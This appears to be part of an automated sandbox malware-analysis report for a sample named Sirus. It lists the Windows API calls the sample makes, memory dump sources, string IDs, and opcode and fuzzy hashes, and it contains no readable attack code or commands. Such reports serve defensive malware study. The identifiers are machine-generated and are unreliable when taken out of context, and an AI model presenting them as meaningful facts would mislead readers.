                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 0539ACC1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979107600.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5390000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: CallProcWindow
                                                    • String ID: U
                                                    • API String ID: 2714655100-3372436214
                                                    APIs
                                                    • PostMessageW.USER32(?,?,00000000,?), ref: 05E18213
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979586094.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5e10000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID: U
                                                    • API String ID: 410705778-3372436214
                                                    APIs
                                                    • PostMessageW.USER32(?,?,00000000,?), ref: 05E18213
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979586094.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5e10000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID: U
                                                    • API String ID: 410705778-3372436214
                                                    APIs
                                                    • SetWindowTextW.USER32(?,?), ref: 05E16576
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979586094.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5e10000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: TextWindow
                                                    • String ID: U
                                                    • API String ID: 530164218-3372436214
                                                    APIs
                                                    • SetWindowTextW.USER32(?,?), ref: 05E16576
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979586094.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5e10000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: TextWindow
                                                    • String ID: U
                                                    • API String ID: 530164218-3372436214
                                                    APIs
                                                    • SetWindowLongW.USER32(?,?,?), ref: 05398846
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979107600.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5390000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: LongWindow
                                                    • String ID: U
                                                    • API String ID: 1378638983-3372436214
                                                    APIs
                                                    • SetWindowLongW.USER32(?,?,?), ref: 05398846
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979107600.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5390000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: LongWindow
                                                    • String ID: U
                                                    • API String ID: 1378638983-3372436214
                                                    APIs
                                                    • GetConsoleWindow.KERNELBASE ref: 076D9AA0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1980241888.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_76d0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: ConsoleWindow
                                                    • String ID: U
                                                    • API String ID: 2863861424-3372436214
                                                    APIs
                                                    • GetConsoleWindow.KERNELBASE ref: 076D9AA0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1980241888.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_76d0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: ConsoleWindow
                                                    • String ID: U
                                                    • API String ID: 2863861424-3372436214
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (bq$U
                                                    • API String ID: 0-2540135491
                                                    APIs
                                                    • GetClassInfoW.USER32(?,?,?), ref: 05E1A418
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979586094.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5e10000_Sirus.jbxd
                                                    Similarity
                                                    • API ID: ClassInfo
                                                    • String ID:
                                                    • API String ID: 3534257612-0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Hbq
                                                    • API String ID: 0-1245868
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: mKI
                                                    • API String ID: 0-2747526811
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U
                                                    • API String ID: 0-3372436214
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: mKI
                                                    • API String ID: 0-2747526811
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6dd446b466dca3080fe645706499e6ba5160c7d3ae239c2f0dd881ab583d7883
                                                    • Instruction ID: 6ce8298c4d7e0a9ae7f28761ee553031fcc6eba8e59aa6085530e3751099487b
                                                    • Opcode Fuzzy Hash: 6dd446b466dca3080fe645706499e6ba5160c7d3ae239c2f0dd881ab583d7883
                                                    • Instruction Fuzzy Hash: 1981E3387106108FCB08EF28D498D697BF6FF89605B2581A9E616CB375DB71EC45CB90
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 07beac972a071595b8018ce8213b97df035626fcf2c639ae14261fb052c71933
                                                    • Instruction ID: eb2fb1cdcc36439f6d7dffe717230a39a636e4a6397d2c5af5727e6188dc2ab7
                                                    • Opcode Fuzzy Hash: 07beac972a071595b8018ce8213b97df035626fcf2c639ae14261fb052c71933
                                                    • Instruction Fuzzy Hash: C0818078A005149FCB04EFA4D4809BEBBF6FF49704F1481AAE906E7364EB35E846CB55
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cbcd222ddf032d5522e7ef026fc1ede9075c045f52ab9593f702911361436922
                                                    • Instruction ID: 1b666d12afae84141e4d90bb90716f8ee8347dabf6752fa1a7a7cd07e48bc2ae
                                                    • Opcode Fuzzy Hash: cbcd222ddf032d5522e7ef026fc1ede9075c045f52ab9593f702911361436922
                                                    • Instruction Fuzzy Hash: E361C3757046448FCB16EB78C815ABE7BB6FF86310B0880AAE505DB2A1DF35AC49CB50
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7d3d8accbb771422157a4559d7e19a505d4e4c25792a6eb079af708262ac9a38
                                                    • Instruction ID: 5e56386ab22d7cd10f8046aeba6afb7f227dccd032b13f05b8130e59ed48685f
                                                    • Opcode Fuzzy Hash: 7d3d8accbb771422157a4559d7e19a505d4e4c25792a6eb079af708262ac9a38
                                                    • Instruction Fuzzy Hash: AF414870B142589FDB54DB69C894EADBBFAFF49604F1440A9E601EB3B1DB71E804CB50
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c9bd83cbffd58e5b327910d755c1e035fc32f0d9ded882c908729d3aa866b7d9
                                                    • Instruction ID: 70800e43d2f967cd57549eadd50325ca92cb776322cbdfc13c749f61fecabea0
                                                    • Opcode Fuzzy Hash: c9bd83cbffd58e5b327910d755c1e035fc32f0d9ded882c908729d3aa866b7d9
                                                    • Instruction Fuzzy Hash: 9F418135E006048BDB28EFB4C4586BD7B76EF88314F1444E9D506BB344CF35698ACBA6
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 744863a4fcad123764f56cb22e6c59c2791651a2bae8d1193aef58f7bd6086f3
                                                    • Instruction ID: 18b91572443dd2b9d2e3b64648b4c8e32d67b747c461a9ac537d55549db794ae
                                                    • Opcode Fuzzy Hash: 744863a4fcad123764f56cb22e6c59c2791651a2bae8d1193aef58f7bd6086f3
                                                    • Instruction Fuzzy Hash: 4F412C30B102099FDB14DFA8D854AADBBB2FF89310F1485A9E511BB3A4DB70ED45CB50
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ee9480e74c615bd1b1e4f862bbdd3405ac40d08667dc6e95d151093c7701ec14
                                                    • Instruction ID: a5324691ab1a73a9ff91236c8eac43615cb61807efa8f6e3b93d35a9bfefd1e9
                                                    • Opcode Fuzzy Hash: ee9480e74c615bd1b1e4f862bbdd3405ac40d08667dc6e95d151093c7701ec14
                                                    • Instruction Fuzzy Hash: A7410074B002058FDF08EBA9C854BFDBBB6FF48314F1494A9D606BB290DB31A845CB64
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 58ace4a1603b2dfe91c0b0c085a501e2706f5091d2f2101a822175ceb57e7fa6
                                                    • Instruction ID: 9e641550356a4e927e3eefda2aa83144bdcc0eac8a8e531b10c8622334089f74
                                                    • Opcode Fuzzy Hash: 58ace4a1603b2dfe91c0b0c085a501e2706f5091d2f2101a822175ceb57e7fa6
                                                    • Instruction Fuzzy Hash: 9F41E874B042288FDF14DF68C895BDDB7B1FF49714F114099EA06AB3A5DB35A805CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4ed39f2010b259487772aa91cbf59f94bbd38c71e3a4c051e5d533bb35190bbe
                                                    • Instruction ID: 2ac1c9b909107a50a74721241ced123645a57f0c7d8dbf556dd9b7dd52848c9d
                                                    • Opcode Fuzzy Hash: 4ed39f2010b259487772aa91cbf59f94bbd38c71e3a4c051e5d533bb35190bbe
                                                    • Instruction Fuzzy Hash: 6A412E30B102089FDB14DFA8D454AADBBB2FF89310F1485A9E511BB3A4DB70ED45CB50
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1c8561d72f06e705fd38206b6bd93061d55edf439930492a6cd85c703c292a18
                                                    • Instruction ID: 90fca3450b6851591d57b9d37e8f5a18956cb9b01b32b5a8d45696f590b5f13a
                                                    • Opcode Fuzzy Hash: 1c8561d72f06e705fd38206b6bd93061d55edf439930492a6cd85c703c292a18
                                                    • Instruction Fuzzy Hash: 8C411F34A006058FCB50EF28D885ABDBBB9FF45304F1080AAE146DB365DB30E849CB85
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 68df76ff74fe3ba7bd9a3d19e8a14f64b8f167853655cd3b9520c8fc05625c17
                                                    • Instruction ID: f30799b5d95e41777f6208e1ecc63a5a65b2faaf61aa23b07c510c722c193838
                                                    • Opcode Fuzzy Hash: 68df76ff74fe3ba7bd9a3d19e8a14f64b8f167853655cd3b9520c8fc05625c17
                                                    • Instruction Fuzzy Hash: 1A413E74A002058FDF18EBA9C854BFDBBB6FF49314F1490A9D606FB250DB30A849CB64
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a0309255008e3c50918b0ccdf7393c1dcb0bfa181bad0cbb735aeb329cc9391
                                                    • Instruction ID: 62f2274c7af48086ea4bf48e71bd73e54d8b4e7c5916f9b1f5da2da1bf231111
                                                    • Opcode Fuzzy Hash: 0a0309255008e3c50918b0ccdf7393c1dcb0bfa181bad0cbb735aeb329cc9391
                                                    • Instruction Fuzzy Hash: F0213970E06218DFCB19DFA0E5995ADBF72FF49300F218499E452632A5CB30A999CB44
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 68779c1072f93100fa16c3309937e8345c92990a3009ebf999e9a11950e9a65f
                                                    • Instruction ID: b2ff8feef9298105ae81c5a4fb4216bf3e70a9b2766a3bc059bf728270b6ecd2
                                                    • Opcode Fuzzy Hash: 68779c1072f93100fa16c3309937e8345c92990a3009ebf999e9a11950e9a65f
                                                    • Instruction Fuzzy Hash: 49313E75B002149FDB18DB59D8489AEBBF6EF8C710F2540A9E506E73A1DA31FD05CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 38a8a0fdbb5b51b33970dbf9cf17dba610992032df44da27402ff2bf2b1f748d
                                                    • Instruction ID: a73f5df624603e7e36cbfad3156614b3010ade28b81c2eda2aeb744960fc136c
                                                    • Opcode Fuzzy Hash: 38a8a0fdbb5b51b33970dbf9cf17dba610992032df44da27402ff2bf2b1f748d
                                                    • Instruction Fuzzy Hash: 4E21EEB17087408BD335AB7588506267BA6EFC6341F0549ADDA52CB3D1EE25FC08CB21
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c66dfd1fb34ad2128f6c792f9e563b657aa85704e2bc48bcf49beb218f88fdd8
                                                    • Instruction ID: 03c34cbe34ddf9b7336678abd2014cadd74c8cd53e18eb3a01d00c65070dd226
                                                    • Opcode Fuzzy Hash: c66dfd1fb34ad2128f6c792f9e563b657aa85704e2bc48bcf49beb218f88fdd8
                                                    • Instruction Fuzzy Hash: 2331A175E007048BDB19EF75C0446BD7AB7EB88704F1044E9C506A7394DF35A98A8BA6
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cc18994f71cf83cab6e77a15c408229cf54129ac580124faae1f46c44562a999
                                                    • Instruction ID: f9032cb0ee4149bc939bc41f110291af1e5fd6e1ed909c592a67f53a52401ed1
                                                    • Opcode Fuzzy Hash: cc18994f71cf83cab6e77a15c408229cf54129ac580124faae1f46c44562a999
                                                    • Instruction Fuzzy Hash: 582106767106104FEB28CB65C8C1ABE77E6FB84221F29806AD24697794D634FD81CB61
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1a9aca777dae393b04609f665e2010ce0fc904823fb62afb9f5d4187eff7fb40
                                                    • Instruction ID: 9100577322517727740af747db221cdd50f4a2cb9ba3b66089bd0bfb3a80d84f
                                                    • Opcode Fuzzy Hash: 1a9aca777dae393b04609f665e2010ce0fc904823fb62afb9f5d4187eff7fb40
                                                    • Instruction Fuzzy Hash: 782141B1F001199BDB14DBA9CD44ABFBBFAFF88240F14855AE615E3254EB709A058B90
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7d24d37530261deb864395cf07c4da18bffca9f49720ce3ee5b36ef4f75ccd5a
                                                    • Instruction ID: 4701b255486620874e819ddaaf3632dc7e31c33148733b1e1e83e34fcb726a72
                                                    • Opcode Fuzzy Hash: 7d24d37530261deb864395cf07c4da18bffca9f49720ce3ee5b36ef4f75ccd5a
                                                    • Instruction Fuzzy Hash: 7021F9367106104FEF38CA69C8C1A7E77E6FBC4220B24846AD24793794D634FD81CB61
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7b33e955e9832c8b10f87ca87fff572d4cf2be1d5d449b27ec23d09ac1464fa0
                                                    • Instruction ID: 67edfaa79cf7f2d2d919cb106db559913d9258c9eeecab6e62e0060bce66364d
                                                    • Opcode Fuzzy Hash: 7b33e955e9832c8b10f87ca87fff572d4cf2be1d5d449b27ec23d09ac1464fa0
                                                    • Instruction Fuzzy Hash: D9210C397105148FCB04DB68D49899D7BF6EF89A0171541AAEA16CB371DF71ED06CB80
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a59a9705a9e37f441067f22163486b3eced9253f80fb8b5235f244aa7242321f
                                                    • Instruction ID: 58e023afa72e6c7ac1ba65f4584d7103ebc887fa4e1cb53724d19f734701f51d
                                                    • Opcode Fuzzy Hash: a59a9705a9e37f441067f22163486b3eced9253f80fb8b5235f244aa7242321f
                                                    • Instruction Fuzzy Hash: 73315578A00209DFCB04DFA8D994AADBBB6FF88301F508569D419AB395DB346E05CF51
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1976104140.0000000000C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C7D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c7d000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b9dce44915dfd4684a2c05edac32a04ac0c43820d02c452322734bd2918d5ca0
                                                    • Instruction ID: eadcc2d9b7cf83e0fb6a2dfc6faddc6d76e4c13376f30a80c97c19d89b4d945f
                                                    • Opcode Fuzzy Hash: b9dce44915dfd4684a2c05edac32a04ac0c43820d02c452322734bd2918d5ca0
                                                    • Instruction Fuzzy Hash: EB21AFB5604204AFDB05DF14D984B26BBB5FF94324F24CAA9E94E4B292C336DC46CA61
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1976104140.0000000000C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C7D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_c7d000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 49ec0112df3fb42d0a7e416d49f6ea57bb4ff849f6e465f97a005dabc0332ea8
                                                    • Instruction ID: cf79c0964485aed063f640b55f1c4a224ffac4ec2fb05996ea45f53526fbe68f
                                                    • Opcode Fuzzy Hash: 49ec0112df3fb42d0a7e416d49f6ea57bb4ff849f6e465f97a005dabc0332ea8
                                                    • Instruction Fuzzy Hash: DA21CF756042009FCB14DF14D984B26BBB5EB94314F24C969E80E4B286C33AD806CA61
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_5bf0000_Sirus.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 084d605531693772ef465a72a73a0198d4ccaef0aa2a6ee5c8f671a3a11dec97
                                                    • Instruction ID: f69008466c6d2542e57c908cc11323551705f07b8c1bae1dd9a043754edd089c
                                                    • Opcode Fuzzy Hash: 084d605531693772ef465a72a73a0198d4ccaef0aa2a6ee5c8f671a3a11dec97
                                                    • Instruction Fuzzy Hash: 5F2184B6F002099FDF05DBA9C9846FEB7B7FF88340B544526D509E7244EB349A058BA1
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1979244244.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
